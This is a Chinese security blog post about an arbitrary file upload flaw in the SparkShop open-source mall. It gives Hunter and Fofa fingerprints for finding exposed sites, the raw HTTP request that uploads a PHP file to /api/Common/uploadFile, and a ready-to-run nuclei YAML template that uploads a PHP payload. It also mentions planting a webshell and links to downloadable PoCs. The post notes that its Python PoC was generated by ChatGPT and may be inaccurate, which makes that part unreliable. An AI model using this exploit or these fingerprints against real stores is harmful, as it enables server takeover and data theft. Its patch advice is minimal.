SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

admin 2024年9月28日10:47:15评论13 views字数 1870阅读6分14秒阅读模式

漏洞介绍

SparkShop开源商城(也被称为星火商城)是一款基于ThinkPHP6和Element UI的开源免费可商用的高性能商城系统。适用于各类电商场景,包括但不限于B2C商城、新零售、分销商城等。无论是初创企业还是成熟品牌,都可以通过SparkShop快速搭建个性化独立商城,实现线上线下的融合营销。

资产测绘

  • 「Hunter」

web.icon=="d37da6ce2bfe6e6f3a21cf95c7eecc0b"

  • 「Fofa」

"SparkShop"

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

漏洞复现

「1、构造数据包」

POST /api/Common/uploadFile HTTP/2
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; 
boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR

------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file";filename="1.php"

------WebKitFormBoundaryj7OlOPiiukkdktZR--

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

「2、查看上传的文件」

/storage/api/20240827/8360c5f4e6e1a956aa8f5798f2263109.php

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

「3、本地搭建环境尝试上传一个大马」

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

POC(Yaml)

话不多说先上POC(Yam-poc由yakit或ProjectDiscovery Cloud Platform生成,Python-poc脚本由chatgpt生成,准确性请自测,如您觉得有用,请动动小手点个关注,为您每天更新最新漏洞POC)

链接:https://pan.baidu.com/s/1HNaRb4be5KE73YTBW4Pbhw?pwd=so00 提取码:so00

id: SparkShop-uploadFile

info:
  name: SparkShop-uploadFile
  author: msk
  severity: high


http:
  - raw:
      - |+
        POST /api/Common/uploadFile HTTP/2
        Host:{{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR
        
        ------WebKitFormBoundaryj7OlOPiiukkdktZR
        Content-Disposition: form-data; name="file";filename="1.php"
        
        <?php phpinfo();unlink(__FILE__);?>
        ------WebKitFormBoundaryj7OlOPiiukkdktZR--


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"storage\/api\")

SparkShop开源商城 uploadFile 任意文件上传漏洞 POc

修复方案

  • 官方已发布安全补丁,建议联系厂商打补丁或升级版本。
  • 引入Web应用防火墙防护,配置接口拦截策略。

原文始发于微信公众号(如棠安全):【漏洞复现】SparkShop开源商城 uploadFile 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日10:47:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SparkShop开源商城 uploadFile 任意文件上传漏洞 POchttp://cn-sec.com/archives/3103647.html

发表评论

匿名网友 填写信息